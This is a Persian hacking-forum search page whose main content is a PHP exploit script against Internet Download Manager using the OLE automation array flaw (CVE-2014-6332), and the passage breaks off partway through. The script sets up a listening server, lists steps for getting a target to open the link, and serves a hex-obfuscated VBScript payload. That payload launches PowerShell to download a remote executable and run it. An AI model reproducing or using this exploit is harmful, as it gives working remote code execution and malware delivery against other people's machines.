امکانات انجمن
  • مهمانان محترم می توانند بدون عضویت در سایت در بخش پرسش و پاسخ به بحث و گفتگو پرداخته و در صورت وجود مشکل یا سوال در انجمنن مربوطه موضوع خود را مطرح کنند

moharram

iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'download'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • پروژه های تیم
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های آسیب پذیری
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


درباره من


جنسیت


محل سکونت

20 نتیجه پیدا شد

  1. #!/usr/bin/php <?php # Title : Internet Download Manager - OLE Automation Array Remote Code Execution # Affected Versions: All Version # Founder : InternetDownloadManager # Tested on Windows 7 / Server 2008 # # # Author : Mohammad Reza Espargham # Linkedin : https://ir.linkedin.com/in/rezasp # E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com # Website : www.reza.es # Twitter : https://twitter.com/rezesp # FaceBook : https://www.facebook.com/mohammadreza.espargham # # # OleAut32.dll Exploit MS14-064 CVE2014-6332 # # # 1 . run php code : php idm.php # 2 . open "IDM" # 3 . Form Menu - Tasks --> Run Site Grabber # 4 . Enter any word "Start page/address" # 5 . Click Addvance # 6 . check "Enter Login and password manually at the following web page" # 7 . Enter your exploit link http://ipaddress:80/ # 8 . Next --> Next --> Next --> Next # 9 . Your Link Download/Execute on your target # 10 . Finished ;) # # #Demo : http://youtu.be/fAUAX7UjXLg $port=80; # Port Address $link="http://10.211.55.3/putty.exe"; # Your exe link $reza = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!'); socket_bind($reza, 0,$port); socket_listen($reza); print " Mohammad Reza Espargham\n www.reza.es\n\nYour Link = http://ipaddress:$port / http://127.0.0.1:$port\n\n"; $msg = "\x3c\x68\x74\x6d\x6c\x3e\x0d\x0a\x3c\x6d\x65\x74\x61\x20\x68\x74\x74\x70\x2d\x65\x71\x75\x69\x76". "\x3d\x22\x58\x2d\x55\x41\x2d\x43\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x22\x20\x63\x6f\x6e\x74\x65". "\x6e\x74\x3d\x22\x49\x45\x3d\x45\x6d\x75\x6c\x61\x74\x65\x49\x45\x38\x22\x20\x3e\x0d\x0a\x3c\x68". "\x65\x61\x64\x3e\x0d\x0a\x3c\x2f\x68\x65\x61\x64\x3e\x0d\x0a\x3c\x62\x6f\x64\x79\x3e\x0d\x0a\x20". "\x0d\x0a\x3c\x53\x43\x52\x49\x50\x54\x20\x4c\x41\x4e\x47\x55\x41\x47\x45\x3d\x22\x56\x42\x53\x63". "\x72\x69\x70\x74\x22\x3e\x0d\x0a\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x72\x75\x6e\x6d\x75". "\x6d\x61\x61\x28\x29\x20\x0d\x0a\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20". "\x4e\x65\x78\x74\x0d\x0a\x73\x65\x74\x20\x73\x68\x65\x6c\x6c\x3d\x63\x72\x65\x61\x74\x65\x6f\x62". "\x6a\x65\x63\x74\x28\x22\x53\x68\x65\x6c\x6c\x2e\x41\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x22". "\x29\x0d\x0a\x63\x6f\x6d\x6d\x61\x6e\x64\x3d\x22\x49\x6e\x76\x6f\x6b\x65\x2d\x45\x78\x70\x72\x65". "\x73\x73\x69\x6f\x6e\x20\x24\x28\x4e\x65\x77\x2d\x4f\x62\x6a\x65\x63\x74\x20\x53\x79\x73\x74\x65". "\x6d\x2e\x4e\x65\x74\x2e\x57\x65\x62\x43\x6c\x69\x65\x6e\x74\x29\x2e\x44\x6f\x77\x6e\x6c\x6f\x61". "\x64\x46\x69\x6c\x65\x28\x27\x46\x49\x4c\x45\x5f\x44\x4f\x57\x4e\x4c\x4f\x41\x44\x27\x2c\x27\x6c". "\x6f\x61\x64\x2e\x65\x78\x65\x27\x29\x3b\x24\x28\x4e\x65\x77\x2d\x4f\x62\x6a\x65\x63\x74\x20\x2d". "\x63\x6f\x6d\x20\x53\x68\x65\x6c\x6c\x2e\x41\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x29\x2e\x53". "\x68\x65\x6c\x6c\x45\x78\x65\x63\x75\x74\x65\x28\x27\x6c\x6f\x61\x64\x2e\x65\x78\x65\x27\x29\x3b". "\x22\x0d\x0a\x73\x68\x65\x6c\x6c\x2e\x53\x68\x65\x6c\x6c\x45\x78\x65\x63\x75\x74\x65\x20\x22\x70". "\x6f\x77\x65\x72\x73\x68\x65\x6c\x6c\x2e\x65\x78\x65\x22\x2c\x20\x22\x2d\x43\x6f\x6d\x6d\x61\x6e". "\x64\x20\x22\x20\x26\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x2c\x20\x22\x22\x2c\x20\x22\x72\x75\x6e\x61". "\x73\x22\x2c\x20\x30\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x3c\x2f\x73". "\x63\x72\x69\x70\x74\x3e\x0d\x0a\x20\x0d\x0a\x3c\x53\x43\x52\x49\x50\x54\x20\x4c\x41\x4e\x47\x55". "\x41\x47\x45\x3d\x22\x56\x42\x53\x63\x72\x69\x70\x74\x22\x3e\x0d\x0a\x20\x20\x0d\x0a\x64\x69\x6d". "\x20\x20\x20\x61\x61\x28\x29\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x62\x28\x29\x0d\x0a\x64\x69\x6d". "\x20\x20\x20\x61\x30\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x31\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61". "\x32\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x33\x0d\x0a\x64\x69\x6d\x20\x20\x20\x77\x69\x6e\x39\x78". "\x0d\x0a\x64\x69\x6d\x20\x20\x20\x69\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x0d\x0a\x64\x69\x6d\x20". "\x20\x20\x72\x6e\x64\x61\x0d\x0a\x64\x69\x6d\x20\x20\x20\x66\x75\x6e\x63\x6c\x61\x73\x73\x0d\x0a". "\x64\x69\x6d\x20\x20\x20\x6d\x79\x61\x72\x72\x61\x79\x0d\x0a\x20\x0d\x0a\x42\x65\x67\x69\x6e\x28". "\x29\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x42\x65\x67\x69\x6e\x28\x29\x0d\x0a". "\x20\x20\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a". "\x20\x20\x69\x6e\x66\x6f\x3d\x4e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x55\x73\x65\x72\x41\x67\x65". "\x6e\x74\x0d\x0a\x20\x0d\x0a\x20\x20\x69\x66\x28\x69\x6e\x73\x74\x72\x28\x69\x6e\x66\x6f\x2c\x22". "\x57\x69\x6e\x36\x34\x22\x29\x3e\x30\x29\x20\x20\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20". "\x65\x78\x69\x74\x20\x20\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x20\x65\x6e\x64\x20\x69". "\x66\x0d\x0a\x20\x0d\x0a\x20\x20\x69\x66\x20\x28\x69\x6e\x73\x74\x72\x28\x69\x6e\x66\x6f\x2c\x22". "\x4d\x53\x49\x45\x22\x29\x3e\x30\x29\x20\x20\x20\x74\x68\x65\x6e\x20\x0d\x0a\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x20\x3d\x20\x43\x49\x6e". "\x74\x28\x4d\x69\x64\x28\x69\x6e\x66\x6f\x2c\x20\x49\x6e\x53\x74\x72\x28\x69\x6e\x66\x6f\x2c\x20". "\x22\x4d\x53\x49\x45\x22\x29\x20\x2b\x20\x35\x2c\x20\x32\x29\x29\x20\x20\x20\x0d\x0a\x20\x20\x65". "\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x20\x65\x78\x69\x74\x20\x20\x20\x66\x75\x6e\x63\x74\x69\x6f". "\x6e\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x65". "\x6e\x64\x20\x69\x66\x0d\x0a\x20\x0d\x0a\x20\x20\x77\x69\x6e\x39\x78\x3d\x30\x0d\x0a\x20\x0d\x0a". "\x20\x20\x42\x65\x67\x69\x6e\x49\x6e\x69\x74\x28\x29\x0d\x0a\x20\x20\x49\x66\x20\x43\x72\x65\x61". "\x74\x65\x28\x29\x3d\x54\x72\x75\x65\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x6d\x79\x61". "\x72\x72\x61\x79\x3d\x20\x20\x20\x20\x20\x20\x20\x20\x63\x68\x72\x77\x28\x30\x31\x29\x26\x63\x68". "\x72\x77\x28\x32\x31\x37\x36\x29\x26\x63\x68\x72\x77\x28\x30\x31\x29\x26\x63\x68\x72\x77\x28\x30". "\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72". "\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x0d\x0a\x20\x20\x20\x20\x20\x6d\x79\x61". "\x72\x72\x61\x79\x3d\x6d\x79\x61\x72\x72\x61\x79\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68". "\x72\x77\x28\x33\x32\x37\x36\x37\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28". "\x30\x29\x0d\x0a\x20\x0d\x0a\x20\x20\x20\x20\x20\x69\x66\x28\x69\x6e\x74\x56\x65\x72\x73\x69\x6f". "\x6e\x3c\x34\x29\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6f\x63\x75". "\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x22\x3c\x62\x72\x3e\x20\x49\x45\x22\x29\x0d\x0a\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x69". "\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x75\x6e". "\x73\x68\x65\x6c\x6c\x63\x6f\x64\x65\x28\x29\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x20\x20\x0d\x0a\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x73\x65\x74\x6e\x6f\x74\x73\x61\x66\x65\x6d\x6f\x64\x65\x28\x29". "\x0d\x0a\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x65\x6e\x64\x20\x69\x66\x0d". "\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69". "\x6f\x6e\x20\x42\x65\x67\x69\x6e\x49\x6e\x69\x74\x28\x29\x0d\x0a\x20\x20\x20\x52\x61\x6e\x64\x6f". "\x6d\x69\x7a\x65\x28\x29\x0d\x0a\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x61\x61\x28\x35\x29\x0d\x0a". "\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x61\x62\x28\x35\x29\x0d\x0a\x20\x20\x20\x61\x30\x3d\x31\x33". "\x2b\x31\x37\x2a\x72\x6e\x64\x28\x36\x29\x0d\x0a\x20\x20\x20\x61\x33\x3d\x37\x2b\x33\x2a\x72\x6e". "\x64\x28\x35\x29\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x66". "\x75\x6e\x63\x74\x69\x6f\x6e\x20\x43\x72\x65\x61\x74\x65\x28\x29\x0d\x0a\x20\x20\x4f\x6e\x20\x45". "\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20\x20\x64\x69\x6d\x20". "\x69\x0d\x0a\x20\x20\x43\x72\x65\x61\x74\x65\x3d\x46\x61\x6c\x73\x65\x0d\x0a\x20\x20\x46\x6f\x72". "\x20\x69\x20\x3d\x20\x30\x20\x54\x6f\x20\x34\x30\x30\x0d\x0a\x20\x20\x20\x20\x49\x66\x20\x4f\x76". "\x65\x72\x28\x29\x3d\x54\x72\x75\x65\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x43". "\x72\x65\x61\x74\x65\x3d\x54\x72\x75\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x45\x78\x69\x74\x20". "\x46\x6f\x72\x0d\x0a\x20\x20\x20\x20\x45\x6e\x64\x20\x49\x66\x20\x0d\x0a\x20\x20\x4e\x65\x78\x74". "\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x73\x75\x62\x20\x74". "\x65\x73\x74\x61\x61\x28\x29\x0d\x0a\x65\x6e\x64\x20\x73\x75\x62\x0d\x0a\x20\x0d\x0a\x66\x75\x6e". "\x63\x74\x69\x6f\x6e\x20\x6d\x79\x64\x61\x74\x61\x28\x29\x0d\x0a\x20\x20\x20\x20\x4f\x6e\x20\x45". "\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20\x20\x20\x20\x20\x69". "\x3d\x74\x65\x73\x74\x61\x61\x0d\x0a\x20\x20\x20\x20\x20\x69\x3d\x6e\x75\x6c\x6c\x0d\x0a\x20\x20". "\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32". "\x29\x20\x20\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x30\x0d\x0a". "\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x29\x3d\x69\x0d\x0a\x20\x20\x20\x20\x20\x61\x62\x28\x30". "\x29\x3d\x36\x2e\x33\x36\x35\x39\x38\x37\x33\x37\x34\x33\x37\x38\x30\x31\x45\x2d\x33\x31\x34\x0d". "\x0a\x20\x0d\x0a\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x2b\x32\x29\x3d\x6d\x79\x61\x72\x72\x61". "\x79\x0d\x0a\x20\x20\x20\x20\x20\x61\x62\x28\x32\x29\x3d\x31\x2e\x37\x34\x30\x38\x38\x35\x33\x34". "\x37\x33\x31\x33\x32\x34\x45\x2d\x33\x31\x30\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x6d\x79\x64\x61". "\x74\x61\x3d\x61\x61\x28\x61\x31\x29\x0d\x0a\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50". "\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x20\x0d\x0a\x65\x6e\x64\x20\x66\x75". "\x6e\x63\x74\x69\x6f\x6e\x20\x0d\x0a\x20\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20". "\x73\x65\x74\x6e\x6f\x74\x73\x61\x66\x65\x6d\x6f\x64\x65\x28\x29\x0d\x0a\x20\x20\x20\x20\x4f\x6e". "\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20\x20\x20\x20". "\x69\x3d\x6d\x79\x64\x61\x74\x61\x28\x29\x20\x20\x0d\x0a\x20\x20\x20\x20\x69\x3d\x72\x75\x6d\x28". "\x69\x2b\x38\x29\x0d\x0a\x20\x20\x20\x20\x69\x3d\x72\x75\x6d\x28\x69\x2b\x31\x36\x29\x0d\x0a\x20". "\x20\x20\x20\x6a\x3d\x72\x75\x6d\x28\x69\x2b\x26\x68\x31\x33\x34\x29\x20\x20\x0d\x0a\x20\x20\x20". "\x20\x66\x6f\x72\x20\x6b\x3d\x30\x20\x74\x6f\x20\x26\x68\x36\x30\x20\x73\x74\x65\x70\x20\x34\x0d". "\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x72\x75\x6d\x28\x69\x2b\x26\x68\x31\x32\x30\x2b\x6b". "\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x6a\x3d\x31\x34\x29\x20\x74\x68\x65\x6e". "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x30\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64". "\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x2b\x32\x29\x28". "\x69\x2b\x26\x68\x31\x31\x63\x2b\x6b\x29\x3d\x61\x62\x28\x34\x29\x0d\x0a\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20". "\x61\x61\x28\x61\x30\x29\x20\x20\x0d\x0a\x20\x0d\x0a\x20\x20\x20\x20\x20\x6a\x3d\x30\x20\x0d\x0a". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x72\x75\x6d\x28\x69\x2b\x26\x68". "\x31\x32\x30\x2b\x6b\x29\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x45\x78\x69\x74\x20\x66\x6f\x72\x0d\x0a". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x0d\x0a\x20\x20". "\x20\x20\x6e\x65\x78\x74\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x32\x29\x3d\x31\x2e\x36\x39\x37". "\x35\x39\x36\x36\x33\x33\x31\x36\x37\x34\x37\x45\x2d\x33\x31\x33\x0d\x0a\x20\x20\x20\x20\x72\x75". "\x6e\x6d\x75\x6d\x61\x61\x28\x29\x20\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d". "\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x4f\x76\x65\x72\x28\x29\x0d\x0a\x20\x20\x20". "\x20\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20". "\x20\x20\x20\x64\x69\x6d\x20\x74\x79\x70\x65\x31\x2c\x74\x79\x70\x65\x32\x2c\x74\x79\x70\x65\x33". "\x0d\x0a\x20\x20\x20\x20\x4f\x76\x65\x72\x3d\x46\x61\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x61\x30". "\x3d\x61\x30\x2b\x61\x33\x0d\x0a\x20\x20\x20\x20\x61\x31\x3d\x61\x30\x2b\x32\x0d\x0a\x20\x20\x20". "\x20\x61\x32\x3d\x61\x30\x2b\x26\x68\x38\x30\x30\x30\x30\x30\x30\x0d\x0a\x20\x20\x20\x0d\x0a\x20". "\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30". "\x29\x20\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x20\x61\x62\x28\x61\x30\x29\x20\x20". "\x20\x20\x20\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65". "\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x74". "\x79\x70\x65\x31\x3d\x31\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x31\x2e\x31\x32\x33\x34". "\x35\x36\x37\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37\x38". "\x39\x30\x0d\x0a\x20\x20\x20\x20\x61\x61\x28\x61\x30\x29\x3d\x31\x30\x0d\x0a\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x49\x66\x28\x49\x73\x4f\x62\x6a\x65\x63\x74\x28". "\x61\x61\x28\x61\x31\x2d\x31\x29\x29\x20\x3d\x20\x46\x61\x6c\x73\x65\x29\x20\x54\x68\x65\x6e\x0d". "\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x69\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x3c\x34\x29". "\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x65\x6d\x3d\x63\x69". "\x6e\x74\x28\x61\x30\x2b\x31\x29\x2a\x31\x36\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x76\x61\x72\x74\x79\x70\x65\x28\x61". "\x61\x28\x61\x31\x2d\x31\x29\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28". "\x28\x6a\x3d\x6d\x65\x6d\x2b\x34\x29\x20\x6f\x72\x20\x28\x6a\x2a\x38\x3d\x6d\x65\x6d\x2b\x38\x29". "\x29\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66". "\x28\x76\x61\x72\x74\x79\x70\x65\x28\x61\x61\x28\x61\x31\x2d\x31\x29\x29\x3c\x3e\x30\x29\x20\x20". "\x54\x68\x65\x6e\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x49\x66\x28\x49\x73\x4f\x62\x6a\x65\x63\x74\x28\x61\x61\x28\x61\x31\x29\x29\x20\x3d". "\x20\x46\x61\x6c\x73\x65\x20\x29\x20\x54\x68\x65\x6e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x74". "\x79\x70\x65\x31\x3d\x56\x61\x72\x54\x79\x70\x65\x28\x61\x61\x28\x61\x31\x29\x29\x0d\x0a\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65". "\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20". "\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x0d\x0a\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x20\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20". "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x20\x0d\x0a\x20\x20". "\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69". "\x66\x28\x76\x61\x72\x74\x79\x70\x65\x28\x61\x61\x28\x61\x31\x2d\x31\x29\x29\x3c\x3e\x30\x29\x20". "\x20\x54\x68\x65\x6e\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x49\x66\x28\x49\x73\x4f\x62\x6a\x65\x63\x74\x28\x61\x61\x28\x61\x31\x29\x29\x20\x3d\x20\x46". "\x61\x6c\x73\x65\x20\x29\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x74\x79\x70\x65\x31\x3d\x56\x61\x72\x54\x79\x70\x65\x28\x61\x61\x28". "\x61\x31\x29\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20". "\x69\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65". "\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x49". "\x66\x28\x74\x79\x70\x65\x31\x3d\x26\x68\x32\x66\x36\x36\x29\x20\x54\x68\x65\x6e\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4f\x76\x65\x72\x3d\x54\x72". "\x75\x65\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x45\x6e\x64\x20\x49\x66\x20\x20\x0d\x0a". "\x20\x20\x20\x20\x49\x66\x28\x74\x79\x70\x65\x31\x3d\x26\x68\x42\x39\x41\x44\x29\x20\x54\x68\x65". "\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4f\x76\x65\x72\x3d\x54\x72\x75\x65\x0d\x0a". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x77\x69\x6e\x39\x78\x3d\x31\x0d\x0a\x20\x20\x20\x20\x45". "\x6e\x64\x20\x49\x66\x20\x20\x0d\x0a\x20\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50". "\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f". "\x6e\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x72\x75\x6d\x28\x61\x64\x64\x29\x20". "\x0d\x0a\x20\x20\x20\x20\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65". "\x78\x74\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20". 